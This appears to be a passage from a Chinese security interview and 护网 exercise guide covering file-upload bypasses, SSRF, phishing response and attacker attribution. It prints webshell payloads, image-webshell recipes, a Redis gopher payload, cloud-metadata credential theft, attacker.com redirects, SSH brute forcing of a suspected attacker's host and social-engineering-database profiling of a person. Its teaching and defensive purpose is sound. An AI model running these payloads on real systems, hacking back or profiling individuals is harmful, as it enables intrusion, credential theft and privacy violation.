文件上传漏洞的利用和防御是渗透测试和护网的重要内容。

前端绕过

有些网站只在前端用JavaScript检查文件后缀，后端没有做校验。这种情况很简单，直接禁用浏览器的JavaScript，或者在浏览器开发者工具里修改前端代码，或者在抓包后修改文件名。

举个例子，假设有一个上传页面，URL是 http://example.com/upload.html，前端JavaScript代码是：

<form&nbsp;action="upload.php"&nbsp;method="post"&nbsp;enctype="multipart/form-data">&nbsp;%20&nbsp;&nbsp;<input&nbsp;type="file"&nbsp;name="file"&nbsp;id="file"&nbsp;accept=".jpg,.png,.gif">&nbsp; &nbsp;&nbsp;<button&nbsp;onclick="return checkFile()">上传</button></form>
<script>function&nbsp;checkFile() {&nbsp; &nbsp;&nbsp;var&nbsp;file =&nbsp;document.getElementById('file').files[0];&nbsp; &nbsp;&nbsp;var&nbsp;ext = file.name.split('.').pop().toLowerCase();&nbsp; &nbsp;&nbsp;if&nbsp;(ext !==&nbsp;'jpg'&nbsp;&& ext !==&nbsp;'png'&nbsp;&& ext !==&nbsp;'gif') {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;alert('只允许上传图片文件');&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;false;&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;return&nbsp;true;}</script>

绕过方式一：禁用JavaScript

1. 在浏览器设置中禁用JavaScript
2. 或者使用浏览器插件（如NoScript）禁用该站点的JS
3. 直接上传shell.php，前端检查被绕过

绕过方式二：开发者工具修改

1. 按F12打开开发者工具
2. 在Sources或Debugger中找到checkFile函数
3. 在函数开头添加return true;，覆盖原有逻辑
4. 上传shell.php

绕过方式三：抓包修改

1. 选择一张正常的图片1.jpg
2. 使用Burp Suite抓包
3. 在请求包中将文件名改为shell.php
4. 发送请求

抓包修改示例：

POST /upload.php HTTP/1.1Host: example.comContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123Content-Length: 456
------WebKitFormBoundaryABC123Content-Disposition: form-data; name="file"; filename="1.jpg"Content-Type: image/jpeg
（图片二进制数据）------WebKitFormBoundaryABC123--

修改为：

POST /upload.php HTTP/1.1Host: example.comContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123Content-Length: 456
------WebKitFormBoundaryABC123Content-Disposition: form-data; name="file"; filename="shell.php"Content-Type: image/jpeg
（图片二进制数据）------WebKitFormBoundaryABC123--

服务端绕过

服务端检测分为黑名单和白名单两种。

黑名单检测是指不允许上传某些后缀，比如asp、php、jsp等。绕过方法很多：大小写混淆，用PHP而不是php；双写关键字，用pphphp；利用解析漏洞，比如IIS的;.jpg，Apache的.htaccess；用特殊字符截断，比如%00截断、换行符截断。

举个例子，假设后端使用黑名单过滤：

$blacklist = array('asp', 'aspx', 'php', 'jsp', 'jspx', 'php3', 'php4', 'php5', 'phtml', 'cer', 'asa');$ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);if (in_array(strtolower($ext), $blacklist)) {    die("不允许上传此类型文件");}

绕过方式一：大小写混淆

上传文件名: shell.PHP或: shell.PhP或: shell.pHp

因为in_array中使用了strtolower，这种方式实际无效，但有些WAF或简单检测可能只匹配小写。

绕过方式二：双写关键字

上传文件名: shell.pphphp

如果后端有简单的删除逻辑（如删除”php”），删除后变成shell.php。

绕过方式三：利用解析漏洞（IIS 6.0）

上传文件名: shell.asp;.jpg

IIS 6.0解析时，遇到;会截断，将shell.asp;.jpg当作.asp执行。

绕过方式四：利用解析漏洞（Apache）

上传文件名: shell.php.xxx

绕过方式五：特殊字符截断（%00）

上传文件名: shell.php%00.jpg

绕过方式六：换行符截断

上传文件名: shell.php\x0a.jpg

在某些环境下，换行符会导致后缀检测失效。

绕过方式七：利用.htaccess

上传文件名: .htaccess文件内容: AddType application/x-httpd-php .jpg

上传后，当前目录下的.jpg文件都会被当作PHP执行。

白名单检测是指只允许上传某些后缀，比如jpg、png、gif等。这种更安全，但还是有绕过方法：00截断，在上传文件名中插入空字节，截断后缀检测；双文件名，有些应用只检查第一个点后面的后缀；MIME类型伪造，把Content-Type改成image/jpeg；图片马，把恶意代码嵌入到图片文件中。

举个例子，假设后端使用白名单过滤：

$whitelist = array('jpg', 'png', 'gif', 'bmp');$ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);if (!in_array(strtolower($ext), $whitelist)) {    die("只允许上传图片文件");}

绕过方式一：00截断

POST /upload.php?filename=shell.php%00.jpg HTTP/1.1

在某些旧版本PHP中，%00截断后，实际保存文件名为shell.php。

绕过方式二：双文件名 有些应用只检查第一个点后面的后缀：

上传文件名: shell.php.jpg

白名单检查.jpg通过，但实际可能保存为shell.php.jpg，如果解析漏洞存在，可能被当作PHP执行。

绕过方式三：MIME类型伪造

POST /upload.php HTTP/1.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
------WebKitFormBoundaryABC123Content-Disposition: form-data; name="file"; filename="shell.php"Content-Type: image/jpeg   ← 伪造MIME类型
<?php&nbsp;system($_GET['cmd']);&nbsp;?>------WebKitFormBoundaryABC123--

绕过方式四：图片马 先制作一张图片马：

# 在图片末尾追加PHP代码copy 1.jpg /b + shell.php /a shell.jpg
# 或使用exiftoolexiftool&nbsp;-Comment='<?php system($_GET["cmd"]); ?>'&nbsp;1.jpg

生成的shell.jpg在图片查看器中正常显示，但被包含时执行PHP代码。

绕过方式五：文件头伪造 在PHP文件开头添加图片文件头：

GIF89a;<?php&nbsp;system($_GET['cmd']);&nbsp;?>

白名单检查后缀为.gif，文件内容以GIF89a;开头，绕过文件头检测。

解析漏洞

某些中间件有解析漏洞，可以利用这些漏洞绕过检测。

IIS 6.0解析漏洞：;.jpg这种文件名会被当成asp解析；/xx.asp/目录下的所有文件都会当成asp解析。

举个例子，目标服务器为IIS 6.0：

漏洞一：分号截断

上传文件名: shell.asp;.jpg

IIS解析时，遇到;会忽略后面的内容，将shell.asp;.jpg当作.asp执行。 访问路径：http://example.com/upload/shell.asp;.jpg

漏洞二：目录解析

上传路径: /upload/shell.asp/shell.jpg

IIS会将/shell.asp/目录下的所有文件都当作ASP执行。 访问路径：http://example.com/upload/shell.asp/shell.jpg

Apache解析漏洞：Apache从右向左识别后缀，如果最右边的后缀不认识，就继续向左识别。比如shell.php.xxx，如果xxx不认识，就会当成php解析。

举个例子，目标服务器为Apache：

利用方式：

上传文件名: shell.php.xxx

Apache解析流程：

1. 识别后缀.xxx，不在mime.types中
2. 继续向左识别.php，在mime.types中，当作PHP执行

访问路径：http://example.com/upload/shell.php.xxx

前提条件：

• Apache配置中mod_mime模块启用
• AllowOverride允许.htaccess覆盖配置

Nginx解析漏洞：在fastcgi配置不当的情况下，访问shell.jpg/xxx.php，shell.jpg会被当成php解析。

举个例子，目标服务器为Nginx，存在错误配置：

location ~ \.php$ {    fastcgi_pass 127.0.0.1:9000;    fastcgi_index index.php;    fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;    include fastcgi_params;}

利用方式：

1. 上传图片马shell.jpg
2. 访问路径：http://example.com/upload/shell.jpg/xxx.php

Nginx解析流程：

1. 看到/xxx.php，匹配到\.php$规则
2. 将shell.jpg/xxx.php作为SCRIPT_FILENAME传给PHP-FPM
3. PHP-FPM认为shell.jpg是可执行文件，执行其中的PHP代码

另一种方式：

http://example.com/upload/shell.jpg%00.php

使用%00截断，同样可以触发。

参考回答

文件上传绕过分几种情况。前端绕过直接禁用JS或者改包就能解决。

黑名单检测可以用大小写混淆、双写关键字、特殊字符截断、解析漏洞等方法。大小写混淆比如用.PHP代替.php；双写比如pphphp；截断可以用%00或换行符；还可以利用IIS的;.jpg解析漏洞、Apache的多后缀解析漏洞。

白名单检测比较严格，可以用00截断、双文件名、MIME类型伪造、图片马等方式。00截断是在文件名中插入%00截断后缀检测；图片马是把PHP代码嵌入到图片中，结合文件包含漏洞执行。

不同中间件还有解析漏洞，IIS 6.0的;.jpg和/xx.asp/目录解析，Apache的多后缀解析，Nginx的/xxx.jpg/xxx.php解析漏洞都可以利用。

13. SSRF漏洞

SSRF是服务端请求伪造，攻击者利用服务端发起请求的能力，让服务端去访问本不该访问的地址。

原理

很多应用需要从服务端发起请求，比如获取外部图片、调用第三方API、抓取网页内容等。如果服务端请求的URL可以由用户控制，又没有做限制，攻击者就可以让服务端去访问内网地址、云元数据服务、甚至本地的敏感文件。

举个例子，假设有一个网站，URL是 http://example.com/fetch，提供了“获取远程图片”的功能，后台的PHP代码是：

<?php$url&nbsp;=&nbsp;$_GET['url'];$content&nbsp;=&nbsp;file_get_contents($url);header('Content-Type: image/jpeg');echo&nbsp;$content;?>

如果攻击者构造URL：

http://example.com/fetch?url=file:///etc/passwd

那么后台代码实际执行的是：

$content = file_get_contents('file:///etc/passwd');

服务器读取本地的/etc/passwd文件，并将其作为图片内容返回，导致敏感文件泄露。如果页面会把内容显示出来，那么服务器上的用户账号信息就会出现在页面上。

如果攻击者构造URL：

http://example.com/fetch?url=http://169.254.169.254/latest/meta-data/

那么后台会请求云服务器的元数据服务（AWS、阿里云等常见内网地址），返回的响应中可能包含云凭证、临时AK/SK等敏感信息，攻击者可利用这些凭证进一步控制云资源。

常用协议

SSRF攻击常用的协议有：

| 协议 | 用途 | 示例 | | — | — | — | | file:// | 读取本地文件 | file:///etc/passwd 、file:///c:/windows/win.ini | | dict:// | 探测内网端口 | dict://192.168.1.1:3306 | | gopher:// | 攻击内网服务（Redis、MySQL等） | gopher://192.168.1.100:6379/_*1%0d%0a$8%0d%0aflushall... | | http:// / https:// | 访问内网Web服务 | http://192.168.1.10/admin |

SSRF攻击示例

1. 利用file://协议读取本地文件

场景：目标网站提供URL图片抓取功能

攻击步骤：

1. 攻击者构造URL：

http://example.com/fetch?url=file:///etc/passwd

2. 服务端执行file_get_contents('file:///etc/passwd')
3. 服务器返回/etc/passwd文件内容

HTTP响应：

HTTP/1.1 200 OKContent-Type: image/jpegContent-Length: 1234
root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologin...

2. 利用http://协议探测内网

场景：目标网站可以抓取外部图片，攻击者想探测内网存活主机

攻击步骤：

1. 攻击者构造URL探测内网Web服务：

http://example.com/fetch?url=http://192.168.1.1:80

2. 如果返回正常图片内容或特定错误信息，说明该IP的80端口开放
3. 遍历内网IP段，发现存活主机

利用dict://协议探测端口：

http://example.com/fetch?url=dict://192.168.1.10:3306

如果返回Connection refused，说明端口关闭；如果返回特定握手信息，说明端口开放。

3. 利用gopher://协议攻击Redis

场景：内网有一台Redis服务器（192.168.1.100，端口6379）未授权访问

攻击步骤：

1. 攻击者构造gopher payload，向Redis写入SSH公钥：

gopher://192.168.1.100:6379/_*2%0d%0a$4%0d%0aAUTH%0d%0a$12%0d%0aredis123%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$[长度]%0d%0a%0a\n\nssh-rsa AAAAB3NzaC1yc2E... root@kali\n\n%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$[长度]%0d%0a/root/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$[长度]%0d%0aauthorized_keys%0d%0a*1%0d%0a$4%0d%0asave%0d%0a

2. 服务端发起请求，Redis执行写入命令
3. 攻击者使用SSH私钥登录Redis服务器

4. 利用云元数据服务获取云凭证

场景：目标服务器部署在云上（AWS、阿里云、腾讯云等）

攻击步骤：

1. 攻击者构造URL访问AWS元数据服务：

http://example.com/fetch?url=http://169.254.169.254/latest/meta-data/

AWS元数据服务返回：

ami-idami-launch-indexami-manifest-pathblock-device-mapping/hostnameiam/instance-actioninstance-idinstance-typelocal-hostnamelocal-ipv4macmetrics/network/placement/profilepublic-hostnamepublic-ipv4public-keys/reservation-idsecurity-groupsservices/

2. 进一步获取IAM角色临时凭证：

http://example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role

返回内容：

{  "Code" : "Success",  "LastUpdated" : "2026-03-15T14:30:00Z",  "Type" : "AWS-HMAC",  "AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",  "Token" : "IQoJb3JpZ2luX2VjE...",  "Expiration" : "2026-03-15T20:30:00Z"}

3. 攻击者获取到云凭证，可以进一步控制云资源

绕过方法

1. 短网址服务

原理：把恶意地址转换成短网址，服务端请求短网址时被重定向到内网地址

示例：

原始地址：http://169.254.169.254/latest/meta-data/短网址：http://t.cn/xxxxx构造URL：http://example.com/fetch?url=http://t.cn/xxxxx

2. 进制转换

原理：用十进制或十六进制表示IP地址，绕过IP黑名单

示例：

127.0.0.1 的十进制：2130706433127.0.0.1 的十六进制：0x7f000001构造URL：http://example.com/fetch?url=http://2130706433/或：http://example.com/fetch?url=http://0x7f000001/

3. 302跳转

原理：用自己的服务器做302跳转到内网地址

示例：

1. 攻击者搭建服务器http://attacker.com/redirect
2. 配置302跳转：

<?phpheader("Location: http://169.254.169.254/latest/meta-data/");?>

3. 构造URL：

http://example.com/fetch?url=http://attacker.com/redirect

4. 服务端请求attacker.com，收到302跳转，跟随跳转访问内网地址

4. DNS重绑定

原理：利用DNS解析的时间差，第一次解析返回一个公网IP（通过白名单检测），第二次解析返回内网IP

示例：

1. 攻击者注册域名attacker.com，配置DNS TTL为0
2. 第一次解析：返回公网IP 1.2.3.4（在白名单内）
3. 第二次解析：返回内网IP 169.254.169.254
4. 服务端检测到IP在白名单后发起请求，但实际连接的是内网IP

修复方法

1. 禁止不需要的协议

<?php$url&nbsp;=&nbsp;$_GET['url'];$scheme&nbsp;=&nbsp;parse_url($url, PHP_URL_SCHEME);
// 只允许http和httpsif&nbsp;(!in_array($scheme, ['http',&nbsp;'https'])) {&nbsp; &nbsp;&nbsp;die("协议不允许");}?>

2. 设置URL白名单

<?php$url&nbsp;=&nbsp;$_GET['url'];$host&nbsp;=&nbsp;parse_url($url, PHP_URL_HOST);
// 只允许访问特定域名$whitelist&nbsp;= ['api.example.com',&nbsp;'images.example.com'];if&nbsp;(!in_array($host,&nbsp;$whitelist)) {&nbsp; &nbsp;&nbsp;die("域名不在白名单中");}?>

3. 限制请求的端口

<?php$url&nbsp;=&nbsp;$_GET['url'];$port&nbsp;=&nbsp;parse_url($url, PHP_URL_PORT);if&nbsp;($port&nbsp;&& !in_array($port, [80,&nbsp;443,&nbsp;8080])) {&nbsp; &nbsp;&nbsp;die("端口不允许");}?>

4. 统一返回信息

<?phptry&nbsp;{&nbsp; &nbsp;&nbsp;$content&nbsp;=&nbsp;file_get_contents($url);&nbsp; &nbsp;&nbsp;echo&nbsp;$content;}&nbsp;catch&nbsp;(Exception&nbsp;$e) {&nbsp; &nbsp;&nbsp;// 统一返回错误信息，不暴露具体原因&nbsp; &nbsp;&nbsp;echo&nbsp;"获取失败";}?>

5. 禁用危险函数

在php.ini中禁用危险函数：

disable_functions = file_get_contents, curl_exec, fsockopen

参考回答

SSRF是服务端请求伪造，攻击者让服务端访问不该访问的地址。常用协议有file://读本地文件、dict://探测端口、gopher://攻击内网服务、http://访问内网Web。绕过方法有短网址、进制转换、302跳转、DNS重绑定。修复方法是禁止不需要的协议、设置URL白名单、限制端口、统一返回信息。在应急响应中，如果发现file://、169.254.169.254等关键字，基本可以判断是SSRF攻击。

14. 钓鱼邮件的处理思路

护网期间，钓鱼邮件是红队常用的攻击手段。蓝队需要能够识别和处理钓鱼邮件。

钓鱼邮件的特征

钓鱼邮件通常有这些特征：发件人地址可疑，可能是拼写错误或者仿冒域名；邮件内容制造紧迫感，比如“24小时内修改密码”“账号异常请点击链接”；包含可疑的链接或附件；要求输入账号密码等敏感信息。

举个例子，某公司员工收到一封邮件：

邮件内容：

发件人: [email protected]收件人: [email protected]主题: 紧急：您的邮箱账户存在异常登录，请立即验证！
尊敬的员工：
系统检测到您的邮箱账户在2026年3月29日 14:30:00 有来自海外IP的异常登录。为保障您的账户安全，请在24小时内点击以下链接完成身份验证，否则账户将被锁定。
http://example-secure.com-verify.com/[email protected]
如有疑问，请联系IT支持中心。
此致IT安全团队

可疑特征：

• 发件人域名example-secure.com是仿冒公司域名company.com的
• 邮件内容制造紧迫感：“24小时内”“否则将被锁定”
• 链接域名example-secure.com-verify.com明显可疑
• 链接中包含收件人邮箱，是个性化钓鱼链接

处理思路

第一步：威胁情报平台扫描

原理：接入威胁情报平台，对邮件内容中出现的URL进行扫描，看是否已经被标记为恶意。

举个例子，将钓鱼邮件中的URL http://example-secure.com-verify.com/login.php 提交到威胁情报平台：

微步在线查询结果：

URL: http://example-secure.com-verify.com/login.php威胁等级: 高危标签: 钓鱼网站、欺诈、恶意软件首次发现: 2026-03-29关联域名: example-secure.com-verify.com关联IP: 45.33.22.11域名注册商: Namecheap注册时间: 2026-03-29

*奇安信威胁情报中心：*

URL分类: 钓鱼网站仿冒对象: company.com恶意类型: 钓鱼登录页面

关键信息提取：

• 恶意域名：example-secure.com-verify.com
• 恶意IP：45.33.22.11
• 域名注册时间：2026-03-29（近期注册）

第二步：屏蔽恶意站点访问

原理：屏蔽办公区域对恶意站点的访问，防止有人不小心点击。可以在防火墙上添加规则，或者通过DNS劫持的方式。

举个例子，在防火墙上添加阻断规则：

防火墙规则：

# 在核心防火墙上添加访问控制规则access-list 101 deny ip any host 45.33.22.11access-list 101 deny ip any host example-secure.com-verify.comaccess-list 101 permit ip any any

*DNS劫持：*

# 在内部DNS服务器上添加解析记录，将恶意域名指向内部警告页面echo "45.33.22.11  example-secure.com-verify.com" >> /etc/hosts
# 或者在DNS服务器上配置响应策略zone "example-secure.com-verify.com" {    type master;    file "/etc/bind/db.block";};
# db.block文件内容$TTL 86400@ IN SOA localhost. root.localhost. (    2024011501 ; Serial    3600 ; Refresh    1800 ; Retry    604800 ; Expire    86400 ; Minimum)@ IN A 192.168.1.1  # 指向内部警告页面* IN A 192.168.1.1

邮件网关过滤：

# 在邮件网关中添加黑名单发件人黑名单: *@example-secure.com域名黑名单: example-secure.com-verify.com内容过滤规则: 包含"异常登录"、"立即验证"、"账户锁定"等关键词的邮件标记为垃圾

第三步：隔离收到邮件的用户终端

原理：隔离收到邮件的用户终端，断开网络，防止已经点击了链接的终端被控制。

举个例子，收到邮件的员工是张三，终端IP为192.168.1.100：

网络隔离：

# 在交换机上关闭端口interface gigabitethernet 0/10shutdowndescription 隔离终端-张三-钓鱼邮件
# 或在防火墙上阻断该IPaccess-list 101 deny ip host 192.168.1.100 any

终端检查：

# 检查浏览器历史记录，看是否访问过恶意链接cat /Users/zhangsan/Library/Application\ Support/Google/Chrome/Default/History
# 检查是否有新下载的文件ls -la ~/Downloads/
# 检查是否有可疑进程ps aux | grep -E "cmd|powershell|bash"
# 检查DNS缓存ipconfig /displaydns | findstr "example-secure"

第四步：样本分析

原理：对邮件进行样本分析，提取发件人IP、域名、附件样本，提交到威胁情报平台，帮助其他人防御。

举个例子，提取钓鱼邮件的关键信息：

邮件头分析：

Return-Path: <[email protected]>Received: from mail.example-secure.com (45.33.22.11) by mx.company.comReceived-SPF: fail (company.com: domain of [email protected] does not designate&nbsp;45.33.22.11&nbsp;as permitted sender)Authentication-Results: mx.company.com; spf=permerrorMessage-ID: <[email protected]>Date: Mon,&nbsp;15&nbsp;Jan&nbsp;2026&nbsp;14:30:00&nbsp;+0800From:&nbsp;"IT Security"&nbsp;<[email protected]>To:&nbsp;"张三"&nbsp;<[email protected]>Subject: 紧急：您的邮箱账户存在异常登录，请立即验证！

提取的关键信息：

| 类型 | 信息 | | — | — | | 发件人IP | 45.33.22.11 | | 发件人域名 | example-secure.com | | 恶意域名 | example-secure.com-verify.com | | 恶意URL | http://example-secure.com-verify.com/login.php | | 目标邮箱 | [email protected] |

如果有附件（如恶意Word文档），进一步分析：

# 提取附件# 查看宏代码olevba malicious.doc
# 提取URLstrings malicious.doc | grep -E "http|https"
# 提取PE文件oledump.py -s 8 malicious.doc > payload.exe
# 分析PE文件strings payload.exe | grep -E "http|cmd|powershell"

提交威胁情报：

# 提交到微步在线curl -X POST "https://api.threatbook.cn/v3/url/submit" \  -d "apikey=xxx" \  -d "url=http://example-secure.com-verify.com/login.php"
# 提交到VirusTotalcurl -X POST "https://www.virustotal.com/api/v3/files" \  -H "x-apikey: xxx" \  -F "[email protected]"

参考回答

处理钓鱼邮件，我会先接入威胁情报平台扫描URL，看是否已被标记为恶意。然后屏蔽恶意站点访问，在防火墙上添加阻断规则，防止有人误点。接着隔离收到邮件的用户终端，断开网络，检查是否已受影响。之后提取邮件的发件人IP、域名、附件样本，提交到威胁情报平台，帮助其他人防御。最后进行全员安全意识培训，告诉大家如何识别钓鱼邮件。

15. 溯源思路

溯源是护网的高级能力，目标是找到攻击者的真实身份。

第一步：提取攻击者IP

原理：从设备告警、钓鱼邮件、木马样本中提取攻击者的IP地址。

举个例子，从各种来源提取IP：

安全设备告警：

告警时间: 2026-03-26 14:30:15告警类型: SQL注入源IP: 103.45.67.89目标IP: 192.168.1.100攻击载荷: union select username, password from users

*Web日志：*

# 查看Web访问日志，提取可疑IPtail -1000 /var/log/nginx/access.log | grep -E "union|select|union select"
103.45.67.89 - - [15/Jan/2024:14:30:15 +0800] "GET /news.php?id=1%20union%20select%20username,password%20from%20users HTTP/1.1" 200 1234

提取的IP列表：

103.45.67.89  # SQL注入攻击源IP

第二步：威胁情报查询

原理：去威胁情报平台查询这个IP的属性，看是代理服务器、跳板机、VPN还是云服务器。如果是云服务器，可以尝试联系云厂商获取购买者信息。

举个例子，将IP 103.45.67.89 提交到威胁情报平台：

微步在线查询结果：

IP: 103.45.67.89地理位置: 中国, 广东省, 深圳市ASN: AS12345运营商: 阿里云标签: 云服务器, 代理, 恶意软件C2首次发现: 2026-03-29最近活动: 2026-03-29关联域名: proxy.example.com威胁等级: 中危

奇安信威胁情报中心：

IP: 103.45.67.89IP类型: 云主机（阿里云）风险标签: 扫描、爆破、Web攻击历史解析域名:  - proxy.example.com (2026-03-29)  - vps-12345.aliyun.com (2026-03-29)

获取的信息：

• IP是阿里云服务器
• 可能是攻击者购买的VPS或代理节点
• 可以尝试联系阿里云获取购买者信息

联系云厂商（需合法流程）：

尊敬的阿里云安全团队：
我司（XXX公司）在2026年3月28日遭受来自IP 103.45.67.89的网络攻击。攻击类型：SQL注入攻击时间：2026-03-29 14:30:15攻击日志：附后
请协助提供该IP的购买者信息，以便我司进行后续处理。
此致XXX公司安全团队

第三步：反向渗透

原理：对攻击者的服务器进行反向渗透。如果攻击者用跳板机，可以尝试拿下跳板机，查看桌面上的敏感文件、登录日志、历史命令，一步一步获取更多信息。

举个例子，假设攻击者用阿里云服务器103.45.67.89作为跳板，且该服务器开放了SSH服务：

端口扫描：

nmap -sV 103.45.67.89

输出：

PORT     STATE    SERVICE     VERSION22/tcp   open     ssh         OpenSSH 7.680/tcp   open     http        nginx 1.14.0443/tcp  open     https       nginx 1.14.08080/tcp open     http-proxy  Squid http proxy

发现漏洞（假设存在弱口令）：

# SSH爆破尝试hydra -l root -P passwords.txt ssh://103.45.67.89
# 爆破成功[22][ssh] host: 103.45.67.89   login: root   password: 123456

登录跳板机：

ssh [email protected]

查看历史命令：

cat ~/.bash_history

输出：

wget http://evil.com/shell.phpchmod +x shell.phpcurl http://target.com/news.php?id=1%20union%20select...nmap -sP 192.168.1.0/24ssh [email protected] /etc/passwd...

查看登录日志：

last

输出：

root     pts/0        45.33.22.11      Mon Jan 15 14:00   still logged inroot     pts/0        1.2.3.4          Mon Jan 15 10:00 - 12:00 (02:00)

获取攻击者真实IP：45.33.22.11

查看敏感文件：

ls -la ~/Desktop/cat ~/Desktop/notes.txt

输出：

攻击目标列表:- 192.168.1.100 (Web服务器)- 192.168.1.10 (数据库)- 192.168.1.20 (文件服务器)
漏洞利用工具:- sqlmap- nmap- hydra- msfconsole
账号密码:- root:123456- admin:admin123

提取更多信息：

• 攻击者真实IP：45.33.22.11
• 攻击者使用的工具
• 攻击者掌握的内部资产信息
• 攻击者保存的账号密码

第四步：蜜罐诱捕

原理：搭建蜜罐诱捕攻击者。蜜罐可以记录攻击者的操作，收集攻击手法和工具，甚至可以反制。

举个例子，搭建一个高交互蜜罐：

部署蜜罐：

# 使用HFish部署蜜罐docker run -d --name hfish -p 443:443 -p 8080:8080 -p 8081:8081 hfish/hfish
# 配置蜜罐服务# - SSH蜜罐: 22端口# - Web蜜罐: 80端口# - 数据库蜜罐: 3306端口

诱饵设置：

# 在公网发布虚假信息# 如：招聘网站发布“XX公司招聘运维工程师，负责服务器管理”# 在GitHub上传包含敏感信息的虚假代码库# 在论坛发布技术文章，其中包含蜜罐IP

攻击者上钩：

蜜罐日志 - 2026-03-29 15:00:00源IP: 45.33.22.11目标: SSH蜜罐 (22端口)操作: 尝试登录 root:123456结果: 登录成功（蜜罐允许）
蜜罐日志 - 2026-03-29 15:01:00命令: whoami输出: root
蜜罐日志 - 2026-03-29 15:02:00命令: cat /etc/passwd输出: root:x:0:0:root:/root:/bin/bash
蜜罐日志 - 2026-03-29 15:03:00命令: wget http://45.33.22.11/tools.sh下载文件: tools.sh
蜜罐日志 - 2026-03-29 15:04:00命令: bash tools.sh执行内容: 下载挖矿程序，反弹shell

收集到的信息：

• 攻击者真实IP：45.33.22.11
• 攻击者使用的工具：tools.sh
• 攻击者的攻击手法：挖矿木马、反弹shell
• 攻击者的C2服务器：45.33.22.11

第五步：社工库查找

原理：利用社工库查找关联信息。如果有攻击者的邮箱、手机号、用户名，可以通过社工库找到更多信息。

举个例子，从跳板机或蜜罐中提取到攻击者的信息：

提取到的信息：

邮箱: [email protected]用户名: evilhacker手机号: 13812345678GitHub账号: evilhacker

社工库查询：

查询邮箱: [email protected]关联信息:  - 注册过知乎、微博、GitHub  - 真实姓名: 张三  - 常用昵称: evilhacker  - 其他邮箱: [email protected]  - 手机号: 13812345678
查询手机号: 13812345678关联信息:  - 归属地: 广东省深圳市  - 运营商: 中国移动  - 注册过微信、支付宝  - 真实姓名: 张三
查询GitHub: evilhacker关联信息:  - 真实姓名: 张三  - 公司: 某安全公司  - 邮箱: [email protected]  - 上传过攻击工具: sqlmap、nmap

完整攻击者画像：

姓名: 张三性别: 男年龄: 25地理位置: 广东省深圳市职业: 安全研究员/渗透测试工程师邮箱: [email protected], [email protected]手机: 13812345678GitHub: evilhacker社交账号: 知乎、微博、微信

参考回答

溯源从攻击痕迹开始，先找到攻击者IP，去威胁情报平台查询属性，看是云服务器还是代理节点。如果是云服务器，可以尝试联系云厂商获取购买者信息。如果拿下了跳板机，查看登录日志和历史命令，逐步找到攻击者真实IP。也可以搭建蜜罐诱捕攻击者，记录攻击者的操作手法和工具。最后通过社工库查找攻击者的邮箱、手机号等关联信息，形成完整画像。

第三部分：护网实战经验谈

一、护网期间的那些“坑”

• 薪资问题

目前市面上你能看到的招聘信息，99%都是中介。这些中介公司90%以上没有任何风险承担能力，甚至有些公司就是为了护网临时开的。所以签合同时，没有人能给你担保，包括你认识的那些大佬或者公众号大V。

选择公司的时候，优先选择口碑好的公司，就是那些没有拖欠薪资记录的公司。不要因为一点预付款就把自己卖了，重点看公司有没有经济实力，能不能在厂商尾款没有按时发的时候，自己垫付资金把工资发出来。

每年护网结束后，都会有人去要工资。希望今年不是你。

• 工作强度

护网期间通常是“白加黑”高强度值守。白班、夜班、倒班，连续两周甚至更长时间。要有心理准备，特别是夜班，对身体的消耗很大。

• 沟通能力

遇到不确定的告警，要及时与研判组、客户沟通，不要自作主张。有些新人看到告警就封IP，结果把正常业务也给封了，这是大忌。要养成“确认后再行动”的习惯。

• 持续学习

护网期间会暴露很多新漏洞、新手法，这是快速学习的好机会。要勤做笔记，把每天遇到的新东西记下来，事后总结复盘。护网结束的时候，你会发现自己的技术提升了一大截。

二、告警分析的实战技巧

• 如何应对海量告警

当告警量特别大的时候，不要想着一条一条分析。要优先关注高危告警，比如WebShell、命令执行、反弹shell、后门上传这些。对于攻击频率较高的IP，及时上报封堵，可以有效减少告警量。

同时，要学会用筛选条件缩小范围。比如只看状态码200的请求，因为404的基本上都是失败的。只看POST请求，因为很多攻击都用POST。只看返回包中包含敏感信息的，比如root、admin、password等。

• 如何判断真实攻击

判断告警是否为真实攻击，可以从这几个方面入手。

第一，查看请求包和响应包。SQL注入告警，就看请求包中有没有select、union、where这些关键字，响应包中有没有数据库错误信息。命令执行告警，就看请求包中有没有whoami、id、ls这些命令，响应包中有没有返回结果。

第二，以攻击IP为索引，查看从护网开始到现在这个IP的所有攻击行为。如果只有一次扫描，可能是误报；如果有完整的攻击链，从探测到利用到后门，那就是真实攻击。

第三，重点关注状态码200的响应包。200表示请求成功，但成功不一定代表攻击成功。还要看响应包的内容，比如命令执行的响应包中包含root，说明执行成功了。

第四，如果无法确定，可以复现。不用客户的网络，用自己的手机热点或者其他网络去访问目标，看payload是否能执行。

• 误报如何处理

确认是误报后，要做好事件记录，然后上报给研判组。如果是因为规则问题导致的误报，可以提出规则优化建议。比如某个正常的业务请求包含了特殊字符，触发了SQL注入规则，可以建议把这个IP加到白名单，或者优化正则表达式。

三、设备使用经验

• 天眼

天眼是奇安信的全流量检测产品，主要功能包括检测、溯源、响应。它有几个核心模块：分析平台用于态势感知和调查分析，流量传感器用于入侵检测和数据采集，文件威胁鉴定器用于静态和动态检测。

天眼的常用检索语法中，运算符有AND、OR、NOT，都需要大写。比如搜索某个IP的攻击告警：src_ip: "1.2.3.4"。天眼里面还有很多小工具，比如解码小工具，可以快速解码Base64、URL编码的payload。

• 态势感知

